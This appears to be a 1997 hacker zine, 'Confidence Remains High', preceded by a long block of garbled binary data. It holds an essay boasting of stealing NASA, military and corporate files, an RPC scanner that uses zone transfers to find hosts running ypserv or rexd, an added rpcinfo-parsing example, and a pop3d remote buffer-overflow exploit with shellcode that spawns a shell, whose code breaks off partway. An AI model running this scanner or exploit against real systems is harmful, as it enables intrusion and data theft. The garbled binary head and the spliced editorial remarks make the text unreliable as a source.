J\N1˦\Z%JIn: N²Ǖ?gq+hv!Fݸ]U=K1NȾ\uRtTJ Dre(W:9xΌt*`77ڻ[I;0ҝ?-]s`:;*`^do\DZZ(Tn5B W?7)/գ`j{j8#}!evw t[߱ϗ񼵷o UCUc7~B FFF2X|txO;Ro|qg>&;|VJu;oj'L&[!"|J8Ɵ`eIKsУGKK$R}}g{???ݿ7?m@]jBPowJꮬwo턛_Z$"Ф=Tcz鐌{RΚLz2"YğyCx-Viilӝ ̯Aay;|PiF|rRh< kfw`lZGJ?4,ת5})嚴YQcA8hl+2(UQ#ےQU+VqjemܬHǪk|5u]Jh?5kѫ!ȉS?v>uwYa7WhWqlʮ\6p(W|e_3nW\-&6s X'"WNߢp:Cp=uEWC6':n\.ܲ>O?pgp #5r֬Iw [u"2~ >ߦ+Q^j:S8I-V2LV<Щk$4e-D!m}Rn2 8"eI+n֔%agJX'h,TA)I4?U*FH}yZ5`{=dii",YaG>u\:riTd۴z2C2XYe֧}m |Oq8`цUD =M#5gοQ-?MG /~db٩'aCLXuϦ=^!e+ f-2̠j$zh\7qxQq7x ˴ F&COG}R4d@f`j^[GdR`.;٨+4ZYYI\e#H(vudq~E-.WbqF=%aV;O ? MZmYt:pfN(D1j˲ {grq\Ay(Qr H"(Vsj!sX/NO5 1s=jdTȋ2^+6s`Z^G5/:DzBF'D4=ODgu2ܤ7 ,Q8eعj&}nR}S<%9ѰBt6""'$ɀjzLbdwGKX8-tU2#@ѯNgGY>.2bR;g"u?AEe7_WBN|hjԞ[q2aȱΏnftr Pe#<SXgSh>$9ô[[6i3֪ t\wjrkO{+$ JXT^{BJebnC|qe8 TSybR&2t˕yXqӟS=eBWzۛJAbub %$FKr]#Cđ8qeg p3L2o)+vdWL9+9ʐQ.@b>އ:/ݢAZERmA|;3J`ıș;w=s=sZڜ֩udNhzwK#};eslGpkuZd-`h!S]XSwisz!l6fY96ؼPcټLNsADeT8r\\ţfG=0rfg E3D6V+!1O+0cW[|]^.Gc/Ujyi\m zx|&Ѣ, r5hd9 %⇿[YRdgPbS .Ϲ˼bs&gDrQoy;08{{S ` @t kZ͇]M}Բ0#PP.%&gnO@@KR#{EL2/v|]J82*'Fp 4Sj8N6 (c݃FdvPIbr$HaTQh?dˆk:DI7#P(+W"MSw햴CݣB Ct!;L hng Jh! _?S 6Ԝ4v-{ J2.*Ŷv{ Lh)djs"MG`zZY֟a5Z{hl3qmu]E?`QIoϔ Vv0w;H>֧-͖sл)p>R`7IS~O>?EuTT1HF;oճk;<{i$ţFvV @LG:qx{o6fn̓\ׁ,w֛yoZbP s'I` $:F7cAݺ`惆@O\4Cц% K|'F|+ 8 H$47T\ZX@us4da9KbtBؽ&2bր++WnۯnUJ2/g@4T3vCM(=sۗ| TR,{8_Y_C\*7fc+Wb*ؗv=_@UA9nKeOJjj>Bl#Rޑj 4}2xH<$5%%h]<6͐0_.Ֆr.-[1dDy#zI DkB@Ea*m6="Iao8\ƠVc;"ƛ{Ng lOfR3oW\)] ↺/GWLMؖ %3X̽=$m9_gRݾi c<3w`$8q\qp>i¤~ :T^9c}!^+ 7&D}EpAX<5& fXj*>DrpށTƶƷ~5|@k.rLgFxאAix,鲦gedy+ͤt!=7-bsa;rDYY( bj4Ğ/smWɗy"z>Z*5V6)sm6"m$(e~#].[ 3oM㯟];6Tl{oFۯ[[N疿ח}KCԋˢ1#2/" 5nRj%xywPzl6!7 -K J/1G5:!#KP((L1f :1P{nWa6Jj;`u,ꁘc" PHt Y.4uvY%E5-h0̫3}~kzPbe!|5/e!Hw0ڏkf v#DFTϋzo.g50 8:iUapp(- ^ `=jXu#@`2#\;9a\m|Zv?}$ШQ?[ ԃCEvs(`.i3K+c"3ic ~t8x0뺇X`Q0Zԏ ifU aCd[4'v -̐^$Kh'Z X#[Է Xw&Q?^w8KYEYX# 9 ^c&֑-zX1P\(% HrRrj >!T6af1khB. 7ȍ=TF6@lhةE_CW%OP+ hxPYD;28w2^ ˀwtbTQAQ L"{zL;S\&]h"@pem1''b'݃AUoǃ3{X\pHC\n3̸ז JGIx=Zٯ'j|{Q hq`x==S,! 
VΌdtY6G*̹8\o~7SsF7Y P@l/L1id $ҕ_F"it#@C2>4kъ쫰t{}c֪&m l+|IW8/IŘ.>gb nCwjpZY0sj#@b]g4j :4lT`s+NQln7WuEBR-B 0WMN ˻! W#"hzUKVFnn>/dNKp HxzU~o0*+Ziqۍ0î$6ICwΫu KL@+. A#9{2ƾU}-'ΘJq35ڥVל+2W9_\I9^Rn8CƘbݘP22S)z( )k>kWg:rdw/<3~q.!kސ2XC6?^r_zwVZܭݕz+G;㤡;{o#'|{fAeҍ>2; ۝\/7Z۟/ZAG;֓?Fo>^>g?ɉ}OG_ˢgYkrb}v梵zV|ߦ{:ş}0P[M듧wd_7O/{o,ˢՍLӚ)Z'p{z_޽aLX}u`5{?W^dSϭ|j=~Kά/v뿩W*=hY/?R[UvZgت?maʊXڦ?6dHr~0IY=/z콇, c (ra/=RRސɢiH$μyayT,4,4E K1?TB[Խ%iÇւvypg6B) RõCQŹf,f 9/Ƴ(p2 ګQ,*Mlnda$:4\v0 ؘ,X,ޞXsJe~JgM@@Ҙ]8(צPpiC6P&PQLJrZ8B}'xbLGC;VcA1%1h ^bN@ _fߎD߶鋭B3)!ľmlbZn44|)[WM|ΔG  {h.A&ɞ%ķA%m,Yi5|GL W/r8ȴ!=pW xʖx.]&qYa>|Ґtj9qDӁya Qw)RFTGI9tVq v uar uv?8Uqߤ7w{`EC#o k^h|M*Cu32t}?88" f:!A:~$aƻ \ʒmʓʺjM}є;MRu\x MVa>5CiMw}"uE]z1_ۺ?T}n7Bwxx3b{K3Kl ɧ!h "lhxk޿Ζ%jgZSJ[-ӓj4ۛ PKA#'Q H1p1 Shokdial.tgzSp%Ӧcgb۶m۞Ěxb۶9'm{b:goڻ鷺鷫$ R^ԁJYS+[h "Р!QRr%ΜVm~7oiWDYdp4ohY۹bugy>>nNt \w|7ٗ<_3oC.5Ƴyy~ n7K(!MW[ R_at}?ժ鿎k捴*5:K8251WcAWoON?;cEP2٨XXtx:Wo4;ݸ{e}%IezzzQu^+({t>i0]q|1>IbWeb@KY3{F'J; M1S 3-ѧ?SțY7y%^J_|$$HCll "a/qCud|oK[xGӸba`ad<d<[:PI`ɹ9Pd8ͥ{7׺Y"E2 jDY+t9XQ=[Z_@{;[::y"77Eh%2ϊd1o;ITF6]P*>~2}] f{^%x? 
}]2|˛FB "gD࿰jZ ?E~/)x2 yʢ| T}1vm1j߷᳆4sƑr.ӗqC0ùWb.KKv29M8MwMU,KA')K:iwTvSOxDo֙6̓1xJDQJZ #kI}PurбTsr'Ѧf[ ѳS-~Bv-8aB)uz ?Ǵը갪ҎlGӈ;A4S(4 d KZ6sgx8y[VM!*Ԥ52u ~ P-bF$z*⡕zB0Ftcbk,9^\8`Z \eI>@&;2u2^y&A\[#ܪ\*+.RvfhH\f5nrQxUr 4 9N$lݪ,29ULKfPpv+lR~BD<"eRoa;~8ceLÄln?h.ЕJP\AJ9wˀlJIeF& %Xs!;ieBRZq`y03.Bj;~ڵ=Vnu$iDY2}y4qoey}1yұp ¡lso퐊.B  ."ps3}G< sIQD0ܤ)^iIlV<2 [,-(yY+1.'i; M1hkߋ[l]W7!E&[[GsIC% !i%oW6~#@Zw}u1$9gw2nVIG0k,C0,& At @Zݸt m+F7k7~דh-а?dM$od$w$=/a܍ť6Ydž~׷:H?EM/f?W.u,Ff <'~|{{șNd*b* XT>ȼh0N|1n*o]EU0V2Wla߷E熌cgyQZd::8>$- χ =w]ܫ[ RyHHҪZ?׈%ԙ 3T5}~cl0ݣ^Oߝ gzOLtgmҌN{d?H'?25@c,r2mZhKiԥg4Xȉ9  ݇%t9@,غٲxXތWt!+:itMҡ?mߔ؛huB@+\q]{UcIB@8kI̼]p'!n/"&ˌr/oE}*D.J)M>5Sk0;D(<#*;T9oӘ).rc1,`4ՀowO[Š H&RHa0{"%^Z_b~kzEI'􋿪Uq`1ٳrY=Q|Q_*WpAͥ0K[R 2ҭ?P+navwBNRXD,VL-L:m=2ɡ(ߏ.oȓjSϢ6l#a~H=f]2beQ,<^tP2aQDRm^B@-wɌsw!O^FB$OO"S]U)oxNn7HU%%y0PSsfr{qb,:ܮ'A=t)X`:hy*%yM6Yn4a8"oɆ~緝grw]m3Ł@'vH]nk>n9>11Xb;BjVب"gu@N0tɾ8lz'R[u4?X!NgԱ%@MBYz5 x ÿJRQ޸BERbH+tu٥٧҆7Kdi6[j.C"k6|uU'4Rјpy|c)ghbm'SWSU! & .U`=jO:d U ֔U^AAedS>l >j 4,g6Մ1;1~%9U^v.<_SCzѭ盜&WĭjTLwʜ>r\gPk L05kX^ǂ+n aXz KI%738+kIV o8eqZ%{^O|,^(+;nܘE򶺌2Jы 1D J?bmv3֔ϔ\ZY?ޘM @Zy9+l!.h=G|v=GEq8dd3)aojH^Mene:%;|tmxhm9vuIG׌$d##k Mive*lŎ.єzٙ}fњePfb{CTĵ_6)%|0sbu_zD(f,H R6ռ\c7f4{,UjP pe@'__~R8C4Fϣ^ (UCY,ΓC~b^ Wdy؏W\t)&.ߡG '1g_2Cӵݎ|b%@Fv'oqO0f2M)'hxS(t8/ 1.W}kTy9϶ W~ncN]9wvR#f!R1]>bՒe[؂-;x'sx&e~*9XEc9A#PLF=23' afۃ%{gӭkK@B~8 f6xYējz^GA8;4(aR7Qк:[DF.˖ƸomL{':x֞C=b m| jb[79ޭs?( r ~F?znyYF;GAy$W}O\ n$]+Wi|j齃[ҥRf|e{OIM91{VWӢi6z  ρ@ m3K[zbtZ=,EE38NѣMZF{x~yjB n}*4J%4~W T;`?оiuөGwS`y=uZJ/ {1}Eg{r33$X{3_*5}nuQ"lQ]Ndj*{Q+msD^|_ >] Tٱ2,.,bBB6. 
lA<3Dnm r];P^pbSn~K$A(*- ?ZbOAy!V102v򠟲NѝhK'%CZ(R_WTxc%X'b6S[LhG*/T;U";`F8Z fYt=]t[yy 5 %%,IG݆>D#u^< f^D53GCj'HXoo $QGDebCl0Cl>bEq$qZ-h WP_ ;Ց$ Q}R{CY1on԰ _[ `1dDžoP&OH'OD ݸ;#+O΢4m9SL\ P „s .:X(o2xq]ys~AHa\2i*|WV#qȪ^^ûn碒*n`E֩e g gLA\oZZJj{ %&}/s9:, Ou^"ˋTRğr4>.EJN-ASzs59Œ V!5h7 kqO Ty Ԑz:_R5(;{d4KLzw8=ݪK8}4zNӕN83WT۞YuqX|zSa0c-ZB߲=8<]6݋˄9 B*s6d艊>klIUSQޓMAQ=gߪz<U|H A43q5STb6m3pv>6"AA0e-7.tXkAS; V't(WHOsXez>9/.a@o-I`,7*C%ƽǧf OdًM%Z< CeZ%{D[QM>aO|}OYo$( ÿ 1eUuCq={ XT77H ,bSw7HvL a|!H[C8$ +R\Ip`:sT-T 1LJt[rXahConE+&+⍵)ѭꖐZJPQoJCPn. PRB1<;F`Qcoa >9JQ&l'Ezi[ek &D 6If1hI >,>Kqv?\P xO56 hv_1ކrNK>bȫUg<`G~bA^vyÓ b+~X][`_RFoS|^Km&^#'|]$'Wd؊:V Ժgxi`;2 y\kVK?s Jܮ1Rߔ IŌs7o*jgO7$5&hp޾+X ]I*MٶD[n q &Svs E[m "ǹ%S=Aϋ pWiGÓBG[9'-D0AF80#tѿAG Yu)u "oĩ0OxfaOT3V˟ \?NKqxt;@qELG9mFX^-FAPk4PLFDe[;CCL2OhePY4|~'$ShÆ{U{Mv)En&Հcr(sq jivGL p'' blE{{KM#Nh4ttwh!\.6,.|UbCd}g1A鹠Q >~aL 5wO P?c= x_t(t/)BYe^2bdF{C #i JZ V f_N/T1;)L8cQ}:ASQ ;.a92&N= P3 60l9BiEGf| V"!?HZN|7w8gITFe(drԙ6'>Vdt3)63ouN^a0z1B;Ґ\$m-O%<5i5Sc,r%ilSt{, O~ѭ=qeB`23jwhMmK!@!XIm#>BGӦ"%̋CNF1m,dTNy[U8ܓ\v7 0w2!Z%/ťUyn*;RTT K>cmC_E«R6bco: ١G&3 *cm?w 'j^ s*|MF&xX`P[zx^"$v=Dok!pj[),mQ6uCZé`DdН#TAGIbDLRQo3.wlN#BYy(%C'm;RB@_ >)֯ s~-`lCj&L#sK>tvwAu Lhɯjv`c"^{ o~!tx0"T2bwKڻp%l[ĀH( VR"L> ME7lHRj! U-QQ-,w=˦ atvHf3ý'Nc IcleK],)nS!;Ŧj5y: tCĸԴ;3"hHVX4Pv0ѤQĻlCV)}!.OLŲre :;9<}ҋʾm* S^P%&ȿ PXvSZY:r9R#^E\ҌYEOt/xh9M,Ca$cݔ"[42x;;_<~ߢm/ &Cp$mh},FIcOVd{ 8ByHtP@0âUů=UKgP')0Pn08 z}[os%Y[[l@I1ۄbd2d9ýʽ~ƪǸ3|=`1!0?[{{2vnOj@o}-'}*h||9A>PV,_N>`w H =G~243MLnpLFvalFNH{ ;r+B.S=RpNabK OBmw{`noKBK9MSzw-A|7Q4]+X'gSWǔ |I͒ǎN\&e}4? Z*|k najف!nQE=x1%A\ i3glf=z/A̍r͸-dL\m_/1,Zjnñ iEAԁԄ=N*,|"ڭ[CAdЏS0FۓieMY?Xk4:qӐ-~P4eZm^|*e Lo:,pfFaFA~ C $60N_PKRvG#M WAREZ.ZIPuyUP$ ={w@ =,nKp-Np]|׮n-UdB$ R|(E* 6& \j>; :fS4'?Ԩc2jЪ,0*,`\WgmUǮ^p/锹%r|k zoD6H6[݇"|s(A:w꘽A!'0@Bx! 
)G,;Z3Sސ Qو L@䩡ηCaD<-ʪ5RJ!񯇹L=3]#sFy8DH5XF9,C 2D+}?(`ӚA#PF0K+6M) c;פe䖚 Xt{WCoEI Y&iIMF'˴8%5Wt^.cIz4Q$c\%fZ$Sk˚<q)/,qvO0:n…jo%xuGkgZ'SQ^V9֭UբSO_DWywHmS*K/O${#VQ?j}x\(Zw xw}p\b={x=w6!8q>}E ܞӕRדz$t&.`Ufi+:=M˹Ɉ WZ^{q e$Jb m8 l9ixjp`ҏ3} w1\npp<3Ku"y٢hψJjn3߮AO!0޷ۻ;WNjJc^wh~0 fO(mܰvpc)TtG힨FWUmi1ozWv4%x@Cޢ~:wcbN$Vϻ/ ˜ҽxAN]LZ+4? +$m!n:ЄT6 ĺ7[4tzi?TpƙpZΟԫa8T55D#3k1hNJ#=(Ot.%Χ])ԏʳQ {.>;_z<F XtO+0ْx-ڎ)TCܘ?ϲ Ͳ1f4@Y(n},P MZq)qbjPዋUTH4Mٿx\c?Agaxh }۬ {-xn?a2q c.F3z^6TC;Ɇtc埒.rv*1P|BZnnq崕HѬ1=+/O):I?|/B"j/W9EdwUX4qgKLDmDUСLd[[*R Ƶ<?%X^uc̈́ RQUɕ,0cjXMOwmТ\mEW t.NOhřA!~x2gnW-7m,!JQ+cb笫58CMv@"t.H0Kiҹ7H<Ï}!9U5Uj`!YWڪ&cE~mF'`I^iJcyQ}͏= Kά;NauKS-C IHafU9 G;G~fa3z8/'̨ ^PƱ Wzk0=D<ؿ9hV)~@Eh_Z"0x:TUژYTU U":!=?*.-*}@Cԓ;Hw;G NoҸl"Z -/\o̯֮Œj0秧;BģVѓ8̊iI{G=ME!;z!g:]K0Yw)S9LUL!}Gi0f"g̟5S\TY?d˘L06chrʼ訐h|zWK>n!L#Nu`@L#p9(-[·֒ 9W;t%0.VI MSV"zLq(~i҄{kþeU:"'BfrqlYe|lg}66Y|@4ŒӠ4W.]%q TzF0/ ܆N#4 L@wb! t^/߼$ oD'zZ5:c 6 ǚ_M`ɃhŚ㌱eE @Q{ * 4-u.=fJkj52*{ /Qke' ͯ%F8H+.ؿS(~qzHsN:;ߎ>f =-ʴg1q*1廪VWb5ppC$3t<ړ4pG_P*AҶfurAGza{FCӏEakLk|zU=b9$"9%& 0eJGɧs$|jcN]*bGD۹Y/q"_V" Hfm#!)-ۓ$H7{x,$2Axnv,  CyaVڟR8 8-V2^Μ7/AbU\Mbq %"cUO+S<_-N2>*-ˏKp)we$ 7B ۾s{3i6 Geu} T'-Y'WNޖQ  /@gc~))rt\>6XAr~fp]5Lܖn,tt9M@ 檑J▉<~ ]80 ӟm |MH9wusEW|Qiv[l{|ՃBrjR$fbOA,"Vg' )~OrXG@,'yUBuX1ty-` iuPF1E]ƹlv,q^) #?EZ' "ކ#I]a|Kg;Q5; Ef~f;3O_EO(^AWǹ%"TN$-;p)3w Lle<2ˈUӦ!$v89@0?_HV@LI.pIĔRGkN965Q-n=xeܮ7?ZqpzMȬp֢xm EM8nw)qKf+f)N i8:Y}K>aSd%\gdM;ᖊ"NڦCj|=6d&, k~s~p,& __AM@`ZfE:^ASb>nR(\'4U&5#m)ԻatasI *'ؑ*:]f 4y&7g 93TO_k L\Cr(zְ?sjMfm[9v:uL&{-|瑞΂rHL)h028YVu7 v#kBA qkSI'ZW5'= c~C6.NRγK4ղȫh+hٌZ lbkA$ζIDk|fFm4hk%c:oy= h E>I J qCۮ{Yh{-!E~hjFt]7S] yꨟ޵)BS"!L7>~L}{2nBas8O œdAtQa~%!̚N̖>7Y23%d5wNgZu~xZV_|9p-~G7`$9N5wd=|%ha^ױg_r%k#'Oq7qZXEkn|`iy1a\{侘1\Ԥ=.hg'F-%haW.vTcrǍY7X Q]=ue#ł]i[L5Q!3R1u\[2-]WNeWP]RWr1W+Z8S ,#я*c' z,qСլZuV#Ux먓y#AoUeU"8 TXװkHWL&BjhB fljC%۱U^EX#fD b]S]ݐ*LY/`d2طÊ̈́pai{~ElrB%2&]'A⥈:nV]={ۿ ƭ~=EqMsG>BOԊpUņ=?m |A߭ABU MrmAϬPptm~[㷇岂\jJ^g?pƾ^͠gBUPWۂ6ĹܗŹ.@sҢjnR6o2 5HR<k{wJr^܎}dą X8$|FHQrqH7>7qeENSmNu {V3\eb0G.JtIp-Ci񟟟EXM8>ѡ۾&b;r񀮬'm Oxw cD/Qv[B() 
crhsum97.txt

                            .oO The CodeZero Oo.
                               .oO Presents Oo.

               Welcome to the special summer edition of...

         [ASCII art banner: "CRH" in block letters, spelling out
          "Confidence Remains High"]

                                Summer 1997.

CRH Editor                          : Tetsu Khan
Official CRH Kung-Fu Film           : Turf On A Rope
Official CRH Pimp                   : so1o
Official CRH Spic With A Red Hat    : xFli
Official CRH T-Shirt Supplier       : NightRage
Official CRH Visual Basic Coder     : \\StOrM\\ aka Jason Sloderbeck
Official CRH Print Brother          : Digital Darkness

         [ASCII art box framing the words "An Official Confidence
          Remains High Production"]

In This "Added Exploits" Issue :

-----=> Section A : Introduction And Cover Story.

1. Confidence Remains High special summer edition.....: Tetsu Khan
2. The network is our playground......................: so1o

-----=> Section B : Exploits And Code.

1. RPC-Check.sh.......................................: yo
2. Linux pop3 remote exploit..........................: Savage
3. Linux HTTPD 1.3 remote.............................: Savage
4. Telnet gateway.....................................: Chaos
5. 0wned.c............................................: so1o
6. Cxterm exploit for Linux...........................: Ming Zhang
7. The king of all sniffers : esniff.c................: unknown
8. Linux nlspath exploit..............................: Solar Designer

-----=> Section C : Phones / Scanning / Radio.

1. How to fuck over a UK payphone.....................: so1o / NightRage
2. Radio link for TI-85 calculators...................: Michael Jan

-----=> Section D : Miscellaneous.

1. Test-cgi holes.....................................: so1o
2. Tree raping........................................: digitalboy [DD]
3. .htpasswd + .htaccess..............................: Cain [DD]
4. Simple NFS skills..................................: Cain [DD]

-----=> Section E : World News.

1. LOPHT.COM..........................................: so1o
2. AAA Report.........................................: so1o
3. Lamer of the fucking year : pSId (DALnet)..........: so1o

------=> Section F : Projects.

1. STiK...............................................: mstrhelix

-----=> Section G : The End. (+ Personal Column)

===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================

1. Confidence Remains High Issue 4 : Tetsu Khan

Issue 4 will be out at the beginning of September, so to last you through the
long hot summer nights, we present the special summer issue of Confidence
Remains High. Nothing really new in this edition, just a few programs to keep
you thinking through the summer, as well as some cool submissions by members
of Digital Darkness. But when you bundle this with CRH issue 3, it becomes
cool :)

Confidence Remains High distro site list...
-------------------------------------------

http://insecurity.insecurity.org/codez/
http://www.r0ot.org
http://www.exceed.net
http://www.7thsphere.com/hpvac/hacking.html
ftp://ftp.sekurity.org/users/so1o/

...And a lot of other sites, just go looking around.

2. The network is our playground : so1o

Just sit back for a few minutes and consider how much power we have as
hackers. From our Linux boxes, or Wind0ze systems, we can connect to many
thousands of Government or Military sites, as well as company networks where
useful information such as credit card details can easily be found. All we
need is the knowledge of holes in such systems, the means to exploit these
holes, and the skills needed to "root" the system; that's all it takes.

In 15 minutes, a hacker could 0wn many important NASA systems, and then
proceed to pull the following types of files from such a system...

 - Personnel information.
 - Mission reports and test results.
 - Satellite programs and information.
 - Future mission dates.

Or say it was a military system; then that hacker, if he knew what he was
doing, would be able to gain access (with relative ease) to the following
kinds of files...

 - Personnel information.
 - Weapons reports.
 - Tactical analysis.
 - Future mission dates.
 - Intelligence papers.

Let's say that a hacker was to attack a company, such as Intel; then he would
be able to access...

 - Product test results.
 - Internal mail between users.
 - Future plans or products.
 - Blueprints.

... then that hacker could sell off that company's research and development
reports to others, and make some ca$h.

It is clear to see that the power we have from just owning a computer and a
modem is quite huge in the right hands, and that it is pretty simple to go
out and find yourself some classified information if you really want to.

===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================

1. RPC-Check.sh : yo

#!/bin/sh
#rpc.chk 1.0
#
# Make sure you have got a newer version of Bourne Shell (SVR2 or newer)
# that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS)
# or /bin/sh (Sun OS, RS/6000 etc). If it's located elsewhere, feel free to
# change the magic number, indicating the type of executable Bourne Shell.
#
# The script obtains via nslookup utility a list of hostnames from a nameserver
# and checks every entry of the list for active rexd procedures as well as
# ypserver procedures. The output is a list of the sites that run those
# daemons and are insecure.
# -yo.

domainname=$1
umask 022
PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH

#
# Function collects a list of sites
# from a nameserver. Make sure you've got the nslookup utility.
#
get_list()
{
  # ask the resolver which nameservers are authoritative for the domain
  ( echo set type=ns
    echo $domainname ) | nslookup | egrep "nameserv" | cut -d= -f2 > .tmp$$ 2>/dev/null
  if [ ! -s .tmp$$ ]; then
    echo "No such domain" >&2
    echo "Nothing to scan" >&2
    exit 1
  fi
  # pull a zone listing from each nameserver (AXFR via "ls"), skip the
  # 7 header lines nslookup prints, and keep the hostname column
  for serv in `cat .tmp$$`; do
    ( echo server $serv
      echo ls $domainname ) | nslookup > .file$$ 2>/dev/null
    lines=`cat .file$$ | wc -l`
    tail -`expr $lines - 7` .file$$ | cut -d" " -f2 > .file.tmp   # .file
    sed -e "s/$/.$domainname/" .file.tmp > .hosts$$
    rm -rf .file* .tmp$$
    sort .hosts$$ | uniq >> HOSTS$$; rm -rf .hosts$$   # (original had "uniq -q", not a valid option)
  done
  # the "<" and ">" redirections here were lost in the printed copy
  tr 'A-Z' 'a-z' < HOSTS$$ > HOSTS.$domainname; rm -rf HOSTS$$
}

#
# Function asks each host's portmapper whether ypserv / rexd are registered.
#
rpc_calls()
{
  for entry in `cat HOSTS.$domainname`; do
    ( rpcinfo -t $entry ypserv >/dev/null && echo $entry runs YPSERV || exit 1 # Error!
    ) >> .log 2>/dev/null
    ( rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD || exit 1 # Error !
    ) >> .log 2>/dev/null
  done
}

# Main

if [ "$domainname" = '' ]; then
  echo "Usage $0 domainname" >&2
  exit 1
fi

get_list

echo "Checking $domainname domain" > .log
echo "*****************************" >> .log
echo "Totally `cat HOSTS.$domainname | wc -l` sites to scan" >> .log
echo "******************************" >> .log
echo "started at `date`" >> .log
echo "******************************" >> .log

rpc_calls

echo "******************************" >> .log
echo "finished at `date`" >> .log
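The script above shells out to "rpcinfo -t host ypserv" and "rpcinfo -t host rex" and trusts the exit status. If you already have "rpcinfo -p" listings (from a scan, or saved from a box you are checking), the same finding can be pulled out of the text by program number, which is what the portmapper actually registers: ypserv is 100004, rexd is 100017. The following is an added example, not part of the zine or yo's script; the rpcinfo output it parses is constructed here and the hostname printed is a placeholder.

```c
#include <stdio.h>
#include <string.h>

/* The two RPC programs rpc.chk probes by name, with the program numbers
 * they register with the portmapper. Both are unauthenticated: ypserv
 * hands the NIS passwd map (password hashes) to anyone who can guess the
 * NIS domain name, and rexd runs commands for whoever asks. */
#define RPC_YPSERV 100004u
#define RPC_REXD   100017u

struct rpc_hit {
    unsigned prog, vers, port;
    char proto[4];
    char name[32];
};

/* Parse the text of `rpcinfo -p host` and collect every line whose program
 * number is ypserv or rexd. Returns the number of hits stored (at most max).
 * The header line and anything not shaped "prog vers proto port name" is
 * skipped, so the name column is informational: the number decides. */
int find_risky_rpc(const char *listing, struct rpc_hit *hits, int max)
{
    int n = 0;
    const char *p = listing;

    while (*p && n < max) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        char line[128];
        struct rpc_hit h;

        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';

        if (sscanf(line, " %u %u %3s %u %31s",
                   &h.prog, &h.vers, h.proto, &h.port, h.name) == 5 &&
            (h.prog == RPC_YPSERV || h.prog == RPC_REXD))
            hits[n++] = h;

        p = eol ? eol + 1 : p + strlen(p);
    }
    return n;
}

/* Convenience wrapper: how many ypserv/rexd registrations does the
 * listing contain? */
int risky_rpc_count(const char *listing)
{
    struct rpc_hit h[32];
    return find_risky_rpc(listing, h, 32);
}

/* Constructed `rpcinfo -p` output for a host running NIS and rexd. */
static const char SAMPLE_RPCINFO[] =
    "   program vers proto   port  service\n"
    "    100000    2   tcp    111  portmapper\n"
    "    100000    2   udp    111  portmapper\n"
    "    100004    2   udp    668  ypserv\n"
    "    100004    2   tcp    671  ypserv\n"
    "    100017    1   tcp   1023  rexd\n"
    "    100003    2   udp   2049  nfs\n";

int main(void)
{
    struct rpc_hit hits[32];
    int i, n = find_risky_rpc(SAMPLE_RPCINFO, hits, 32);

    for (i = 0; i < n; i++)
        printf("victim.example runs %s (prog %u, %s/%u)\n",   /* placeholder host */
               hits[i].name, hits[i].prog, hits[i].proto, hits[i].port);
    return 0;
}
```

On the sample listing this reports ypserv twice (udp and tcp) and rexd once; a host with only nfs and the portmapper reports nothing. Extending the table is a matter of adding program numbers, which is more reliable than matching the service name, since rpcinfo prints names only when it can look them up in /etc/rpc.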
2. Linux pop3 remote exploit : Savage

/*
 * pop3d Linux/intel remote xploit by savage@apostols.org 1997-April-05
 *
 * workz fine against old pop3d distributed with pine.
 *
 * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of ToXyn !!!
 *
 * usage:
 *   $ (imap 0; cat) | nc victim 110
 *          |
 *          +--> usually from -100 to 100
 *
 * (the printed copy said port 143, which is IMAP; pop3d listens on 110)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* NOP sled, then execve("/bin/sh") shellcode, then a little more padding.
 * Everything after this in `username` is filled with the return address. */
char shell[] =
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
  "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
  "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xe8\xc0\xff\xff\xff/bin/sh";

char username[1024+255];

/* ASSUMED placeholder: the stack address constant on this line was lost
 * from the printed copy. It is not the author's value; argv[1] shifts it. */
#define RET_ADDR 0xbffff500

int main(int argc, char *argv[])
{
  size_t i;
  int a;
  long val;

  if (argc > 1)
    a = atoi(argv[1]);
  else
    a = 0;

  strcpy(username, shell);

  /* pad the rest of the USER argument with the guessed return address,
   * least-significant byte first (i386) */
  for (i = strlen(username); i + 4 < sizeof(username); i += 4)
  {
    val = RET_ADDR + a;
    username[i]   =  val & 0x000000ff;
    username[i+1] = (val & 0x0000ff00) >> 8;
    username[i+2] = (val & 0x00ff0000) >> 16;
    username[i+3] = (val & 0xff000000) >> 24;
  }
  username[sizeof(username) - 1] = 0;

